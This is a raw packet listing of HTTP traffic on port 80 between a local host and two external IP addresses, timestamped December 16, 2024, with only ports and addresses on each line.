Dec 16, 2024 11:03:32.540862083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.540889978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.540915012 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.540941000 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.541594028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.541640997 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.541667938 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.541718960 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.542325020 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.542373896 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.542418003 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.542464972 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.543034077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.543087006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.543154001 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.543205023 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.543807030 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.543855906 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.543900967 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.543950081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.544500113 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.544548988 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.544658899 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.544706106 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.545223951 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.545274019 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.545319080 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.545362949 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.545999050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.546051979 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.546123981 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.546173096 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.546775103 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.546825886 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.546833992 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.546885967 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.546988010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.547039032 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.561037064 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.561079979 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.561127901 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.561155081 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.561173916 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.561188936 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.561229944 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.561261892 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.561263084 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.561317921 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.561366081 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.561440945 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.561455011 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.561491966 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.561530113 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.680965900 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.680984974 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.681063890 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.681087971 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.681118965 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.681150913 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.681159019 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.681214094 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.681314945 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.681324005 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.681329966 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.681391001 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.681391001 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.681406975 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.681436062 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.681446075 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.681467056 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.681476116 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.681498051 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.681523085 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.681550026 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.681562901 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.681601048 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.681612015 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.681627035 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.681644917 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.681663990 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.681691885 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.698971033 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.699071884 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.699088097 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.699156046 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.699157000 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.699210882 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.699389935 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.699414015 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.699429035 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.699440002 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.699481010 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.699858904 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.699903965 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.699944019 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.699959040 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.699990034 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.700015068 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.700018883 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.700681925 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.700738907 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.700754881 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.700769901 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.700802088 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.700803041 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.700851917 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.701433897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.701500893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.701518059 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.701555014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.701574087 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.701582909 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.702214956 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.702265978 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.702265978 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.702280045 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.702295065 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.702325106 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.702348948 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.702368021 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.702413082 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.703079939 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.703104973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.703119993 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.703145027 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.703162909 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.703191042 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.703253031 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.703824043 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.703851938 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.703870058 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.703893900 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.703912973 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.703974962 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.704150915 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.704627037 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.704684019 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.704688072 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.704705000 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.704754114 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.704782009 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.704834938 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.705393076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.705450058 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.705461025 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.705466032 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.705503941 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.705528975 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.705544949 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.705611944 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.706193924 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.706249952 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.706274986 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.706290007 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.706321001 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.706341028 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.706391096 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.707009077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.707025051 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.707050085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.707075119 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.707110882 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.707118988 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.707206964 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.707784891 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.707812071 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.707827091 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.707856894 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.707902908 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.707928896 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.707993031 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.708630085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.708646059 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.708662033 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.708707094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.708719969 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.708719969 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.708767891 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.709362984 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.709414005 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.709429979 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.709482908 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.709563017 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.709623098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.710170984 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.710197926 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.710212946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.710243940 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.710282087 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.710324049 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.710386038 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.710957050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.710983992 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.710999012 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.711040020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.711081982 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.711154938 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.711754084 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.711808920 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.711817980 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.711833954 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.711864948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.711875916 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.711927891 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.712527037 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.712579966 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.712611914 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.712626934 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.712661028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.712670088 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.712697983 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.712726116 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.713344097 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.713402987 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.713418007 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.713458061 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.713483095 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.713498116 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.713546991 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.714127064 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.714174986 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.714190006 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.714231014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.714271069 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.714298010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.714920998 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.714971066 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.714977026 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.714987040 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.715025902 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.715056896 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.715068102 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.715775013 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.715822935 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.715830088 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.715838909 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.715871096 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.715910912 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.716341019 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.716509104 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.716564894 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.716566086 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.716583014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.716619015 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.716639996 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.716665030 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.716696024 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.717299938 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.717350006 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.717365980 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.717403889 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.717431068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.717444897 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.717493057 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.718131065 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.718157053 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.718173027 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.718200922 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.718226910 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.718235970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.718281031 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.718998909 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.719013929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.719031096 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.719047070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.719079018 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.719115019 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.801219940 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.801240921 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.801251888 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.801281929 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.801330090 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.801357031 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.801431894 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.801472902 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.801659107 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.801680088 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.801692963 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.801719904 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.801723957 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.801734924 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.801748037 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.801762104 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.801795006 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.801803112 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.801809072 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.801826000 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.801866055 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.801872969 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.801917076 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.801944017 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.802015066 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.802026987 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.802050114 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.802071095 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.802109957 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.802118063 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.802131891 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.802179098 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.802237034 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.802249908 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.802295923 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.802320957 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.802326918 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.802340984 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.802375078 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.802391052 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.802403927 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.802407026 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.802440882 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.802453995 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.802467108 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.802489042 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.802505016 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.802537918 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.802565098 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.802592993 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.802613020 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.802638054 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.891334057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.891360998 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.891377926 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.891395092 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.891407013 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.891427040 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.891459942 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.891753912 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.891778946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.891794920 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.891805887 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.891813993 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.891830921 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.891869068 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.892323971 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.892353058 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.892368078 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.892374992 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.892401934 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.892421007 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.892772913 CET	80	49833	31.41.244.11	192.168.2.5
